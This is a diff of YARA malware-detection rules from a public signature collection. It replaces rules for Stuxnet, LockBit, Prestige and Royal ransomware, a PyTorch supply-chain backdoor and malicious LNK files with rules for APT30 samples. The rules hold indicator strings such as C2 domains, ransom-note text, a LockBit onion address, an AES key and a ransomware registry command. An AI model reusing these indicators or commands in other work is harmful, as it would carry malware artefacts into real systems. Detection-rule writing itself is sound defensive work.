-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxnet.yar#L112-L128"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L702-L725"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a4ad77490d17cf897c4639f0b9f9473267886e99a94b4f506670207497117764"
+		logic_hash = "ff39fc7643441652ec0cdf2f84c7827d326ddb5f01451b3857cfc4015eb01467"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c709198"
-		hash2 = "1635ec04f069ccc8331d01fdf31132a4bc8f6fd3830ac94739df95ee093c555c"
+		hash1 = "35dfb55f419f476a54241f46e624a1a4"
+		hash2 = "4fffcbdd4804f6952e0daf2d67507946"
+		hash3 = "597805832d45d522c4882f21db800ecf"
+		hash4 = "6bd422d56e85024e67cc12207e330984"
+		hash5 = "82e13f3031130bd9d567c46a9c71ef2b"
+		hash6 = "b79d87ff6de654130da95c73f66c15fa"
 
 	strings:
-		$x1 = "\\objfre_w2k_x86\\i386\\guava.pdb" ascii
-		$x2 = "MRxCls.sys" fullword wide
-		$x3 = "MRXNET.Sys" fullword wide
+		$s0 = "Windows Security Service Feedback" fullword wide
+		$s1 = "wssfmgr.exe" fullword wide
+		$s2 = "\\rb.htm" ascii
+		$s3 = "rb.htm" fullword ascii
+		$s4 = "cook5" ascii
+		$s5 = "5, 4, 2600, 0" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them ) or ( all of them )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Stuxnet_Maindll_Decrypted_Unpacked
+rule SIGNATURE_BASE_APT30_Sample_27 : FILE
 {
 	meta:
-		description = "Stuxnet Sample - file maindll.decrypted.unpacked.dll_"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7009a41c-0588-5392-ae1c-045e0a5ee56b"
-		date = "2016-07-09"
+		id = "22815745-086f-59ee-aac1-f35e49aa5835"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxnet.yar#L130-L150"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L727-L746"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bec740cdb4c1748d0fb546691cf8feb38c0e61adad60c069c5866f5034cb7ed9"
+		hash = "959573261ca1d7e5ddcd19447475b2139ca24fe1"
+		logic_hash = "5ef0661c5c04f0f0923548509363971011194a16e4308fcfdea5db90e85518a4"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4c3d7b38339d7b8adf73eaf85f0eb9fab4420585c6ab6950ebd360428af11712"
 
 	strings:
-		$s1 = "%SystemRoot%\\system32\\Drivers\\mrxsmb.sys;%SystemRoot%\\system32\\Drivers\\*.sys" fullword wide
-		$s2 = "<Actions Context=\"%s\"><Exec><Command>%s</Command><Arguments>%s,#%u</Arguments></Exec></Actions>" fullword wide
-		$s3 = "%SystemRoot%\\inf\\oem7A.PNF" fullword wide
-		$s4 = "%SystemRoot%\\inf\\mdmcpq3.PNF" fullword wide
-		$s5 = "%SystemRoot%\\inf\\oem6C.PNF" fullword wide
-		$s6 = "@abf varbinary(4096) EXEC @hr = sp_OACreate 'ADODB.Stream', @aods OUT IF @hr <> 0 GOTO endq EXEC @hr = sp_OASetProperty @" wide
-		$s7 = "STORAGE#Volume#1&19f7e59c&0&" fullword wide
-		$s8 = "view MCPVREADVARPERCON as select VARIABLEID,VARIABLETYPEID,FORMATFITTING,SCALEID,VARIABLENAME,ADDRESSPARAMETER,PROTOKOLL,MAXLIMI" ascii
+		$s0 = "Mozilla/4.0" fullword ascii
+		$s1 = "dizhi.gif" fullword ascii
+		$s5 = "oftHaveAck+" ascii
+		$s10 = "HlobalAl" fullword ascii
+		$s13 = "$NtRND1$" fullword ascii
+		$s14 = "_NStartup" ascii
+		$s16 = "GXSYSTEM" fullword ascii
 
 	condition:
-		6 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Stuxnet_S7Hkimdb : FILE
+rule SIGNATURE_BASE_APT30_Sample_28 : FILE
 {
 	meta:
-		description = "Stuxnet Sample - file s7hkimdb.dll"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e4cb277f-5eee-5405-9d48-d06657392323"
-		date = "2016-07-09"
+		id = "1bc8c68f-ebbb-58b1-92aa-5954318096a0"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stuxnet.yar#L152-L188"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L748-L776"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a44063b6a542eca17f46802e9f644540f1d6b6cb9777c20ef9ea14e44c341a1c"
+		logic_hash = "d246a188ad9ec69948bef6018bab1e7a244c76dcf511c3f9d16024ef7e369ae2"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4071ec265a44d1f0d42ff92b2fa0b30aafa7f6bb2160ed1d0d5372d70ac654bd"
+		hash1 = "e62a63307deead5c9fcca6b9a2d51fb0"
+		hash2 = "5b590798da581c894d8a87964763aa8b"
 
 	strings:
-		$x1 = "S7HKIMDX.DLL" fullword wide
-		$op1 = { 8b 45 08 35 dd 79 19 ae 33 c9 8b 55 08 89 02 89 }
-		$op2 = { 74 36 8b 7f 08 83 ff 00 74 2e 0f b7 1f 8b 7f 04 }
-		$op3 = { 74 70 81 78 05 8d 54 24 04 75 1b 81 78 08 04 cd }
+		$s0 = "www.flyeagles.com" fullword ascii
+		$s1 = "iexplore.exe" fullword ascii
+		$s2 = "www.km-nyc.com" fullword ascii
+		$s3 = "cmdLine.exe" fullword ascii
+		$s4 = "Software\\Microsoft\\CurrentNetInf" fullword ascii
+		$s5 = "/dizhi.gif" ascii
+		$s6 = "/connect.gif" ascii
+		$s7 = "USBTest.sys" fullword ascii
+		$s8 = "/ver.htm" fullword ascii
+		$s11 = "\\netscv.exe" ascii
+		$s12 = "/app.htm" fullword ascii
+		$s13 = "\\netsvc.exe" ascii
+		$s14 = "/exe.htm" fullword ascii
+		$s18 = "MicrosoftHaveAck" fullword ascii
+		$s19 = "MicrosoftHaveExit" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 40KB and $x1 and all of ( $op* ) )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and 7 of them
 }
-rule SIGNATURE_BASE_SUSP_LNK_Embedded_Worddoc : FILE
+rule SIGNATURE_BASE_APT30_Sample_29 : FILE
 {
 	meta:
-		description = "check for LNK files with indications of the Word program or an embedded doc"
-		author = "Greg Lesnewich"
-		id = "9677d41a-9d29-510c-98cd-122dc0ca9606"
-		date = "2023-01-02"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "24334885-fcb4-5a13-82e8-c8465f97361e"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L3-L20"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L778-L798"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "120ca851663ef0ebef585d716c9e2ba67bd4870865160fec3b853156be1159c5"
-		logic_hash = "a53fbfe0ccb5a4ab2320cde10d17f29770d888cf21cda4fdccc3d7ae8d123293"
-		score = 65
+		hash = "44492c53715d7c79895904543843a321491cb23a"
+		logic_hash = "7a59118ba00413961e6fc4d54680373d033a38d698613f853f67137b85c123a7"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
-		DaysofYARA = "2/100"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$doc_header = {D0 CF 11 E0 A1 B1 1A E1}
-		$icon_loc = "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.exe" ascii wide
+		$s0 = "LSSAS.exe" fullword ascii
+		$s1 = "Software\\Microsoft\\FlashDiskInf" fullword ascii
+		$s2 = ".petite" fullword ascii
+		$s3 = "MicrosoftFlashExit" fullword ascii
+		$s4 = "MicrosoftFlashHaveExit" fullword ascii
+		$s5 = "MicrosoftFlashHaveAck" fullword ascii
+		$s6 = "\\driver32" ascii
+		$s7 = "MicrosoftFlashZJ" fullword ascii
 
 	condition:
-		uint32be( 0x0 ) == 0x4C000000 and filesize > 10KB and any of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_SUSP_LNK_Smallscreensize
+rule SIGNATURE_BASE_APT30_Sample_30 : FILE
 {
 	meta:
-		description = "check for LNKs that have a screen buffer size and WindowSize dimensions of 1x1"
-		author = "Greg Lesnewich"
-		id = "6194a76b-36d6-51d1-8d53-2e11172e29d2"
-		date = "2023-01-01"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "787b288a-6fb4-5483-af76-933651ec6d58"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L22-L44"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L800-L817"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "285985c21e34f8412b49dbfe04abad9f93af195801d0a8870ec3795b8a9a3787"
-		score = 65
+		hash = "3b684fa40b4f096e99fbf535962c7da5cf0b4528"
+		logic_hash = "5ecfc8d53b768f624c8765f70708bfaae5396d7aa6b0335f7c656f4350649c5d"
+		score = 75
 		quality = 85
-		tags = ""
-		version = "1.0"
-		DaysofYARA = "1/100"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$dimensions = {02 00 00 A0 ?? 00 ?? ?? 01 00 01 00 01}
+		$s0 = "5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)" fullword wide
+		$s3 = "RnhwtxtkyLRRMf{jJ}ny" fullword ascii
+		$s4 = "RnhwtxtkyLRRJ}ny" fullword ascii
+		$s5 = "ZRLDownloadToFileA" fullword ascii
+		$s9 = "5.1.2600.2180" fullword wide
 
 	condition:
-		uint32be( 0x0 ) == 0x4c000000 and all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_Janicab_LNK
+rule SIGNATURE_BASE_APT30_Sample_31 : FILE
 {
 	meta:
-		description = "detect LNK files used in Janicab infection chain"
-		author = "Greg Lesnewich"
-		id = "c21844d3-eeee-530e-a69c-b7f604616f0b"
-		date = "2023-01-01"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9333870b-7eaa-54dd-a801-7292708fb592"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L46-L68"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L819-L836"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0c7e8427ee61672568983e51bf03e0bcf6f2e9c01d2524d82677b20264b23a3f"
-		hash = "22ede766fba7551ad0b71ef568d0e5022378eadbdff55c4a02b42e63fcb3b17c"
-		hash = "4920e6506ca557d486e6785cb5f7e4b0f4505709ffe8c30070909b040d3c3840"
-		hash = "880607cc2da4c3213ea687dabd7707736a879cc5f2f1d4accf79821e4d24d870"
-		hash = "f4610b65eba977b3d13eba5da0e38788a9e796a3e9775dd2b8e37b3085c2e1af"
-		logic_hash = "f9c000ffb6a95d616459e00f0220ad26cb1df77e35582d14dfce1637ddfb466c"
+		hash = "8b4271167655787be1988574446125eae5043aca"
+		logic_hash = "003bfa9774d3e85829cc266d06417b86287986994995adfa7a2bd26c3648c07e"
 		score = 75
-		quality = 85
-		tags = ""
-		version = "1.0"
-		DaysofYARA = "1/100"
+		quality = 60
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$j_pdf1 = "%PDF-1.5" ascii wide
-		$j_cmd = "\\Windows\\System32\\cmd.exe" ascii wide
-		$j_pdf_stream = "endstream" ascii wide
-		$j_pdb_obj = "endobj" ascii wide
-		$dimensions = {02 00 00 A0 ?? 00 ?? ?? 01 00 01 00 01}
+		$s0 = "\\ZJRsv.tem" ascii
+		$s1 = "forceguest" fullword ascii
+		$s4 = "\\$NtUninstallKB570317$" ascii
+		$s8 = "[Can'tGetIP]" fullword ascii
+		$s14 = "QWERTY:,`/" fullword ascii
 
 	condition:
-		uint32be( 0x0 ) == 0x4C000000 and $dimensions and 2 of ( $j_* )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_SUSP_ELF_Invalid_Version : FILE
+rule SIGNATURE_BASE_APT30_Generic_J : FILE
 {
 	meta:
-		description = "Identify ELF file that has mangled header info."
-		author = "@shellcromancer"
-		id = "5bd97fdd-0912-5f9b-877c-91fff9b98dea"
-		date = "2023-01-01"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "64a5106e-d7f3-5c68-a14e-410149a1bb9e"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://tmpout.sh/1/1.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L70-L86"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L838-L869"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "05379bbf3f46e05d385bbd853d33a13e7e5d7d50"
-		logic_hash = "33f096318647867bcd90d7ba77878f43d34477b2b2cbd7410c191e60573d6cd5"
-		score = 55
+		logic_hash = "7c404689b60fe493ca9b503902173ac04d7bb00488edec9e69006e6d51e20c51"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "0.1"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "49aca228674651cba776be727bdb7e60"
+		hash2 = "5c7a6b3d1b85fad17333e02608844703"
+		hash3 = "649fa64127fef1305ba141dd58fb83a5"
+		hash4 = "9982fd829c0048c8f89620691316763a"
+		hash5 = "baff5262ae01a9217b10fcd5dad9d1d5"
+		hash6 = "9982fd829c0048c8f89620691316763a"
+
+	strings:
+		$s0 = "Launcher.EXE" fullword wide
+		$s1 = "Symantec Security Technologies" fullword wide
+		$s2 = "\\Symantec LiveUpdate.lnk" ascii
+		$s3 = "Symantec Service Framework" fullword wide
+		$s4 = "\\ccSvcHst.exe" ascii
+		$s5 = "\\wssfmgr.exe" ascii
+		$s6 = "Symantec Corporation" fullword wide
+		$s7 = "\\5.1.0.29" ascii
+		$s8 = "\\Engine" ascii
+		$s9 = "Copyright (C) 2000-2010 Symantec Corporation. All rights reserved." fullword wide
+		$s10 = "Symantec LiveUpdate" fullword ascii
+		$s11 = "\\Norton360" ascii
+		$s15 = "BinRes" fullword ascii
+		$s16 = "\\readme.lz" ascii
 
 	condition:
-		( uint32( 0 ) == 0x464c457f and uint8( 0x6 ) > 1 )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_ELF_Torchtriton : FILE
+rule SIGNATURE_BASE_APT30_Microfost : FILE
 {
 	meta:
-		description = "Detection for backdoor (TorchTriton) distributed with a nightly build of PyTorch"
-		author = "Silas Cutler"
-		id = "85e98ee7-30bf-554f-a0ac-9df263e6dfe4"
-		date = "2023-01-02"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "19231001-1da3-5be6-8275-03c9fc7c6377"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://www.bleepingcomputer.com/news/security/pytorch-discloses-malicious-dependency-chain-compromise-over-holidays/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L88-L117"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L871-L885"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2385b29489cd9e35f92c072780f903ae2e517ed422eae67246ae50a5cc738a0e"
-		logic_hash = "12de3c3785aaf3623097db58abfe8ee2cbd9a0e712bf752165952de9a5fdb07d"
+		hash = "57169cb4b8ef7a0d7ebd7aa039d1a1efd6eb639e"
+		logic_hash = "1fe5be3a88859fd3d485adfba92cf117afedc739bd0a46c039124919c3b81361"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
-		DaysofYARA = "2/100"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$error = "failed to send packet"
-		$aes_key = "gIdk8tzrHLOM)mPY-R)QgG[;yRXYCZFU"
-		$aes_iv = "?BVsNqL]S.Ni"
-		$func01 = "splitIntoDomains("
-		$func02 = "packageForTransport"
-		$func03 = "gatherFiles"
-		$func04 = "void sendFile("
-		$domain = "&z-%`-(*"
+		$s1 = "Copyright (c) 2007 Microfost All Rights Reserved" fullword wide
+		$s2 = "Microfost" fullword wide
 
 	condition:
-		uint32( 0 ) == 0x464c457f and ( ( all of ( $aes_* ) ) or ( all of ( $func* ) and $error ) or ( $domain and 2 of them ) )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_GOLDBACKDOOR_LNK
+rule SIGNATURE_BASE_APT30_Generic_K : FILE
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "Greg Lesnewich"
-		id = "9a80f875-4843-535c-9f2b-b04da55713b1"
-		date = "2023-01-02"
-		modified = "2023-12-05"
-		reference = "https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L119-L142"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "49629825-4233-5d74-b763-b2500536eb90"
+		date = "2015-04-03"
+		modified = "2023-01-06"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L887-L917"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "120ca851663ef0ebef585d716c9e2ba67bd4870865160fec3b853156be1159c5"
-		logic_hash = "043d01758c722964e848e51cf2747c5879f03f0fd43af827e2035abf113daf9d"
+		hash = "142bc01ad412799a7f9ffed994069fecbd5a2f93"
+		logic_hash = "eed03bb4290eef0ad1cf362a157923aa1fb8faa9305b5aaba3563d0a4e65e1a5"
 		score = 75
 		quality = 85
-		tags = ""
-		version = "1.0"
-		DaysofYARA = "2/100"
+		tags = "FILE"
 
 	strings:
-		$doc_header = {D0 CF 11 E0 A1 B1 1A E1}
-		$doc_icon_loc = "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.exe" ascii wide
-		$script_apionedrivecom_hex_enc_str = "6170692e6f6e6564726976652e636f6d" wide
-		$script_kernel32dll_hex_enc_str = "6b65726e656c33322e646c6c" wide
-		$script_GlobalAlloc_hex_enc_str = "476c6f62616c416c6c6f63" wide
-		$script_VirtualProtect_hex_enc_str = "5669727475616c50726f74656374" wide
-		$script_WriteByte_hex_enc_str = "577269746542797465" wide
-		$script_CreateThread_hex_enc_str = "437265617465546872656164" wide
+		$x1 = "Maybe a Encrypted Flash" fullword ascii
+		$s0 = "C:\\Program Files\\Common Files\\System\\wab32" fullword ascii
+		$s1 = "\\TEMP\\" ascii
+		$s2 = "\\Temporary Internet Files\\" ascii
+		$s5 = "%s Size:%u Bytes" fullword ascii
+		$s7 = "$.DATA$" fullword ascii
+		$s10 = "? Size:%u By s" fullword ascii
+		$s12 = "Maybe a Encrypted Flash" fullword ascii
+		$s14 = "Name:%-32s" fullword ascii
+		$s15 = "NickName:%-32s" fullword ascii
+		$s19 = "Email:%-32s" fullword ascii
+		$s21 = "C:\\Prog" ascii
+		$s22 = "$LDDATA$" ascii
+		$s31 = "Copy File %s OK!" fullword ascii
+		$s32 = "%s Space:%uM,FreeSpace:%uM" fullword ascii
+		$s34 = "open=%s" fullword ascii
 
 	condition:
-		uint32be( 0x0 ) == 0x4C000000 and 1 of ( $doc* ) and 2 of ( $script* )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and ( all of ( $x* ) and 3 of ( $s* ) )
 }
-rule SIGNATURE_BASE_MAL_EXE_Lockbit_V2 : FILE
+rule SIGNATURE_BASE_APT30_Sample_33 : FILE
 {
 	meta:
-		description = "Detection for LockBit version 2.x from 2011"
-		author = "Silas Cutler, modified by Florian Roth"
-		id = "a2c27110-e63b-5f93-88a0-98c12811e8b4"
-		date = "2023-01-01"
-		modified = "2023-01-06"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L144-L169"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "be6afc4a-97fe-56ba-b057-e21415f9833d"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L919-L939"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "00260c390ffab5734208a7199df0e4229a76261c3f5b7264c4515acb8eb9c2f8"
-		logic_hash = "9472727d75e34d8bf87c56b74a6dfc04052e621b5fe31732ea9a10c76a05e0c0"
-		score = 80
-		quality = 60
+		hash = "72c568ee2dd75406858c0294ccfcf86ad0e390e4"
+		logic_hash = "295c2d9fcf1c3bab54650fd1d203dfb8c12269945aad8927066ef6f815abea69"
+		score = 75
+		quality = 85
 		tags = "FILE"
-		version = "1.0"
-		DaysofYARA = "1/100"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s_ransom_note01 = "that is located in every encrypted folder." wide
-		$s_ransom_note02 = "Would you like to earn millions of dollars?" wide
-		$x_ransom_tox = "3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7" wide
-		$x_ransom_url = "http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion" wide
-		$s_str1 = "Active:[ %d [                  Completed:[ %d" wide
-		$x_str2 = "\\LockBit_Ransomware.hta" wide ascii
-		$s_str2 = "Ransomware.hta" wide ascii
+		$s0 = "Version 4.7.3001" fullword wide
+		$s1 = "msmsgr.exe" fullword wide
+		$s2 = "MYUSER32.dll" fullword ascii
+		$s3 = "MYADVAPI32.dll" fullword ascii
+		$s4 = "CeleWare.NET1" fullword ascii
+		$s6 = "MYMSVCRT.dll" fullword ascii
+		$s7 = "Microsoft(R) is a registered trademark of Microsoft Corporation in the" wide
+		$s8 = "WWW.CeleWare.NET1" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 1 of ( $x* ) or 2 of them ) or 3 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and 6 of them
 }
-
-rule SIGNATURE_BASE_MAL_EXE_Prestigeransomware : FILE
+rule SIGNATURE_BASE_APT30_Sample_34 : FILE
 {
 	meta:
-		description = "Detection for Prestige Ransomware"
-		author = "Silas Cutler, modfied by Florian Roth"
-		id = "5ac8033a-8b15-5abe-89d5-018a4fef9ab5"
-		date = "2023-01-04"
-		modified = "2023-01-06"
-		reference = "https://www.microsoft.com/en-us/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_100days_of_yara_2023.yar#L171-L195"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a4802e13-4151-5f17-ba91-dcf9ef6b52bb"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L941-L960"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5fc44c7342b84f50f24758e39c8848b2f0991e8817ef5465844f5f2ff6085a57"
-		logic_hash = "2f51ca71d28c8d0df8de22011e16919672d5f9d3f3d94594c5d0cbf7f1585a1e"
-		score = 80
+		hash = "216868edbcdd067bd2a9cce4f132d33ba9c0d818"
+		logic_hash = "2406f9613585669f88c389ea9729a089f6aef13fba46d60b713f51cd3a946b5d"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
-		DaysofYARA = "4/100"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x_ransom_email = "Prestige.ranusomeware@Proton.me" wide
-		$x_reg_ransom_note = "C:\\Windows\\System32\\reg.exe add HKCR\\enc\\shell\\open\\command /ve /t REG_SZ /d \"C:\\Windows\\Notepad.exe C:\\Users\\Public\\README\" /f" wide
-		$ransom_message01 = "To decrypt all the data, you will need to purchase our decryption software." wide
-		$ransom_message02 = "Contact us {}. In the letter, type your ID = {:X}." wide
-		$ransom_message03 = "- Do not try to decrypt your data using third party software, it may cause permanent data loss." wide
-		$ransom_message04 = "- Do not modify or rename encrypted files. You will lose them." wide
+		$s0 = "dizhi.gif" ascii
+		$s1 = "eagles.vip.nse" ascii
+		$s4 = "o%S:S0" ascii
+		$s5 = "la/4.0" ascii
+		$s6 = "s#!<4!2>s02==<'s1" ascii
+		$s7 = "HlobalAl" ascii
+		$s9 = "vcMicrosoftHaveAck7" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( 1 of ( $x* ) or 2 of them or pe.imphash ( ) == "a32bbc5df4195de63ea06feb46cd6b55" )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_EXE_Royalransomware : FILE
+rule SIGNATURE_BASE_APT30_Sample_35 : FILE
 {
 	meta:
-		description = "Detection for Royal Ransomware seen Dec 2022"
-		author = "Silas Cutler, modfied by Florian Roth"
-		id = "f83316f7-b8c4-5907-a38e-80535215e7ef"
-		date = "2023-01-03"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
